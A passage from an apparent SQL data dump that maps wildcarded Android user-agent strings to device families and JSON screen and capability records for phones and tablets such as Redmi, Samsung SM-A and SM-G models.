Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Pure F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; QC-704G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; QMobile S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_qmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; QMobile i6i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_qmobile','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Quantum xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; R1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; R7Plusm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; R7kf) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; R7plusf) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; R7sf) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RAINBOW JAM 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RAINBOW JAM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RAINBOW LITE 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RAINBOW LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RAINBOW UP 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RIDGE 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RIDGE FAB 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RIO-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RM02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ROME_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi 3) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi Note 2) AppleWebKit/* (KHTML, like Gecko) Chrome','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi Note 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Redmi_Note_3) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Rise50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Rover) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; RoverPad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Royal R1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Royal R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S-TELL M477) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S4035_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S455) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S4S5IN3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S5003D_CHAMP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S5E_NXT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; S9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG GT-I9295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG GT-I9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG GT-I9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG GT-I9506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG GT-I9515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SCH-I545) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SGH-I337M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sgh','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A300F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A300FU-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A300H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A300M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A310M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-A800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-E500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-E500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-E700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G360BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G360F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G360M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G360T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G360T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G361F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G361H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G388F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 